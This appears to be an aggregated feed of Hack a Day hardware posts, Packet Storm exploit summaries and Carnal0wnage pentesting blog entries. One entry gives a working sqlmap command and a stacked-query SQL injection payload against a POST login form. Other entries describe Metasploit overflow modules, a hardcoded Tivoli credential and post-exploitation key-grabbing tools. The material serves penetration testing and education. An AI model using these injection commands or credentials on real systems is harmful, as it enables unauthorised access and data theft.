9:01 - Hack a Day
[Christopher] piped up in our comments on a recent post about using laptop touch pads in other things, noting that he had done this on his Ultimate Calculator Version 2. What he’s done is upgraded his TI-83+ calculator to house a number of improvements and customizations. It now has a stronger RGB backlight so he [...]
7:58 - Packet Storm Security Exploits
This Metasploit module exploits a stack-based buffer overflow in the BEA Weblogic Apache plugin. The connector fails to properly handle specially crafted HTTP POST requests, resulting in a buffer overflow due to the insecure usage of sprintf. Currently, this module works on Windows systems without DEP, and has been tested with Windows 2000 / XP. In addition, the Weblogic Apache plugin version is fingerprinted with a POST request containing a specially crafted Transfer-Encoding header.
16:09 - Packet Storm Security Recent Files
Ransack is a post exploitation shellscript for penetration testers. Its purpose is to grab any information deemed relevant on a system, post root compromise. This information may include config files, ssh keys, ssl keys, or any other information deemed valuable.
7:01 - Hack a Day
Yet another Fallout post here on Hackaday. This time, instead of the PIP-Boy, someone has built a fantastic prop for the iconic Nuka-Cola. The circuit is super simple, really just an LED array to light up the beverage just right. The construction of the base is quite nice though. If you’re a fan of functional [...]
6:00 - Hack a Day
In case you have been on vacation, here is the best that we have had on our blog in the past week: In first place is a post about [the University of Pennsylvania's] quadcopter team. This time they have a group of twenty quadcopters flying in formation. In second place is a post about a [...]
13:01 - Hack a Day
2011 was an interesting year here at Hackaday. We have about 24% more viewers now than we did last year. We started producing our own video content and we have shown some pretty interesting projects in our daily posts. In this post, we are gathering together the best of the best. Our #1 post for [...]
6:00 - Hack a Day
In case you missed them the first time, here are our most popular posts from the past week. In first place is a post that made our mothers wash our mouths out with soap. It is a periodic table of swearing! Up next is a post about a micromouse robot that can run a maze [...]
6:01 - Hack a Day
The “Picture Post”, a tool for a program going on through the University of New Hampshire, is a method of taking what amounts to extreme time-lapse photography. The purpose of this project is to observe the world around you with a 360 degree view taken at a regular interval. The setup is quite simple consisting [...]
7:00 - Hack a Day
In case you missed them the first time, here are the most popular posts from this week: Our most popular post this week was about how to use HTML5 to display sensor data. This is a pretty interesting demo of the new web technology. Next up is a post about an animatronic zombie that can [...]
7:00 - Hack a Day
In case you missed them the first time, here are our most popular posts from the past week. Our most popular post of the week was about a ball that has a matrix of 256 LEDs encrusted onto its surface, allowing all sorts of patterns to be displayed. Next up is a post about the [...]
7:00 - Hack a Day
In case you missed them the first time, here are our most popular posts from the past week. Our most popular post this week is about a clock modeled after Lord Vetinari’s clock in Discworld that ticks at random intervals but keeps accurate time. Our next most popular post is of a project that takes [...]
10:00 - Hack a Day
In case you missed them the first time, here are our most popular posts from this past week. Our most popular post was about a ‘flashlight’ build. We are using the word flashlight loosely since this monster can draw up to 500 Watts! Our next most popular post was about another [Jörg Sprave] project where [...]
8:01 - Hack a Day
In case you missed them, here are our biggest posts from the past week. For the weapons enthusiasts in our audience, make sure to check out our most popular post this week where [Liquider] shows a project in which an airsoft pistol was converted into a coil gun. Our next most popular post was based [...]
7:00 - Hack a Day
In case you missed them, here are our biggest posts from the past week. The post that drew the most attention this week was our own [Kevin Dady]’s post about how to install Linux on a 386. In this post, he talks about the process that he used to put a functional copy of Linux [...]
18:00 - Hack a Day
After writing this post on someone hacking QR codes, Hack A Day commenters came out in full force posting some really cool links about modifying QR codes to include a logo. I’ll fully admit I geeked out a little, but in the process I figured out some of the theory behind embedding logos in QR [...]
11:58 - Hack a Day
After seeing our communications via light post, reader [Chris] dropped this handy little link in our inbox. A very good tutorial about using infrared to enable communications between two PIC microcontrollers. The tutorial covers all the parts you will need, physical wiring and schematics with notes detailing each section of the circuit. It [...]
0:52 - Packet Storm Security Recent Files
Whitepaper called Post Exploitation using Metasploit pivot and port forward. A very nice feature in Metasploit is the ability to pivot through a meterpreter session to the network on the other side. This tutorial walks you through how this is done once you have a meterpreter session on a foreign box.
9:45 - Packet Storm Security Recent Files
This Metasploit module exploits a stack-based buffer overflow in the way IBM Tivoli Endpoint Manager versions 3.7.1, 4.1, 4.1.1, and 4.3.1 handle long POST query arguments. This issue can be triggered by sending a specially crafted HTTP POST request to the service (lcfd.exe) listening on TCP port 9495. To trigger this issue, authorization is required. This exploit makes use of a second vulnerability: a hardcoded account (tivoli/boss) is used to bypass the authorization restriction.
11:43 - Packet Storm Security Exploits
Post Revolution version 0.8.0c suffers from cross site request forgery, cross site scripting, and denial of service vulnerabilities.
10:00 - Hack a Day
Instructables user [Mike Craghead] was in the middle of building a very compact public computer kiosk when he ran into a problem with the processor fan. It was too big for the enclosure and had to be swapped out with a fan that did not allow the motherboard to monitor its rotational speed. Motherboards don’t [...]
19:14 - Carnal0wnage
So first a disclaimer: I didn't listen to the referenced podcast; this is based solely on this blog post:
http://newschoolsecurity.com/2011/04/data-driven-pen-tests
"So I’m listening to the “Larry, Larry, Larry” episode of the Risk Hose podcast, and Alex is talking about data-driven pen tests. I want to posit that pen tests are already empirical. Pen testers know what techniques work for them, and start with those techniques.
What we could use are data-driven pen test reports. “We tried X, which works in 78% of attempts, and it failed.”
We could also use more shared data about what tests tend to work.
Thoughts?"
Dre's response to the post was surprising to me; he listed a bunch of tools that seem to do correlating of pentest results into a portal so you can trend over time. Cool idea, I'll give the people that. But to me, when we start jumping into repeatable, metrics-driven stuff we are in Vulnerability Assessment land, not pentesting land.
Here is the comment I left:
"I like the idea and I think it could be useful. However, they need to drop the pentest part. You are solidly into the vulnerability assessment part of things when you are talking about “ok, I tried 1,2,3,4,5 and 1 & 3 worked, ok on to the next set of tests”… that's vulnerability assessment (with exploitation if you want to get technical) and not pentesting.
Pentesting is about that human looking at the problem and figuring out how to break it, not some scanner. That's going to be very hard to standardize and put hard numbers on, and I don't think it's going to be possible without tying up your tester’s time with bullshit."
I'm all for "repeatable" pentests. You should have a methodology for each type of test, but when you are paying for a human's time you should be paying for them to go after the site like a human would and not how a scanner would, or not in a way where I'm worried about religiously following some checklist because if I don't the metrics get all fucked up. Your pentest should come after you have thrown the kitchen sink at it scanner-wise.
As an added bonus, this post was right below the New School post in my Google Reader:
http://coding-insecurity.blogspot.com/2011/04/developing-good-methodology-part-3.html
"This post and really any methodology document you will ever read or write will have gaps, because no document on this subject can ever really be 100% all inclusive of every vulnerability and the myriad of variations that exist for many of these."
I think it drives the point home as well.
-CG
5:29 - Carnal0wnage
Notes for sqlmap and POST requests since every f**king tutorial only covers GETs
Options you'll want to use:
-u URL, --url=URL
--method=METHOD
--data=DATA
-p TESTPARAMETER
--prefix=PREFIX
--postfix=POSTFIX
--dbms=DBMS
*--dbms= if sqlmap is sucking
We'll assume we have a simple POST request:
user@ubuntu:~/pentest/sqlmap-dev$ python sqlmap.py -u "http://192.168.1.100/fancyshmancy/login.aspx" --method POST --data "usernameTxt=blah&passwordTxt=blah&submitBtn=Log+On" -p "usernameTxt" --prefix="')" --dbms=mssql -v 2
--method to pass the POST option
--data to pass the parameters that are required for the POST
-p to pass the injectable field, so in this case the username field (usernameTxt)
--prefix to pass what needs to be passed before we can inject. We had to issue a tick ( ' ) and right parenthesis ( ) ) to close out the query
--dbms to tell it the backend was mssql
This yields us an sqlmap query like so:
Place: POST
Parameter: usernameTxt
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: usernameTxt=blah'); WAITFOR DELAY '0:0:5';-- AND ('yTwo'='yTwo&passwordTxt=blah&submitBtn=Log+On
---
6:04 - Hack a Day
[Stealth] put together a post explaining how he writes drivers for input peripherals. He’s using Python which makes the process fairly painless (we’ll get to that in a minute) but the value of his post is in the explanation surrounding how to interpret the data. Once you know how the communications are coming in from [...]
14:30 - Hack a Day
This post on Reddit by [superangryguy] caught our attention today. He’s put together a video explaining the basics of how to build balancing robots, focusing on a 555 timer based one. He’s got two main versions, the 555 based one and another that is based off of two transistors. He says the 555 based one [...]
8:34 - Carnal0wnage
Received this comment to Val's post:
"Submitted by Anonymous on Tue, 01/04/2011 - 09:33.
The problem with pentesters phishing ...
The problem with pentesters phishing ... is that it does more harm than good for the organization. Without the education piece following a phish, you set up the organization to ban the practice."
Phishing and client-side attacks have been going on for far too long to not allow your testers to use them during a test.**
So on one hand you are correct: every phishing exercise done either by an internal team, pentester, or attacker should be followed by an education piece by your internal security/IT team. Every phishing attack is an opportunity to retrain users.
On the other hand, it's how people get in. To broadly call it useless because 1. you are too lazy to educate your users after the fact or 2. didn't think ahead enough to require the PT shop to leave you with education materials or follow up the phish with an education piece doesn't mean it lacks value.
Like I mentioned in the previous post, you need to know how you are going to stand up in realistic scenarios. Does one client-side 0day leave your whole network open to all sorts of badness? You need to know.
**This is assuming that the company's maturity level supports doing a phishing exercise. If your internal security just plain sucks, then you could probably win the argument that no phishing should be conducted, but I would counter with why are you getting a pentest in the first place if things are that bad. Use those consulting dollars to have the consultant help you with your risk plan, internal vulnerability scanning/patching program, workstation/server hardening or teaching you how to scan your internal assets yourself. To steal a Nickerson analogy... "how do you know you can put up a fight if you can't take a punch" BUT that doesn't mean you start out getting your ass kicked by starting training with [INSERT MMA BADASS HERE] instead of working your way up.
6:17 - Packet Storm Security Recent Files
This OWASP HTTP Post denial of service tool was created for testing web applications for availability concerns from HTTP GET and HTTP POST denial of service attacks.
10:15 - Hack a Day
We know you just got a links post a couple hours ago, but more people tipped us off to some great Halloween stuff and we just couldn’t wait. [Michael] came up with this fantastic idea for a flying ghost. He’s using a twin prop tilt rotor design to fly his ghost all over the neighborhood. [...]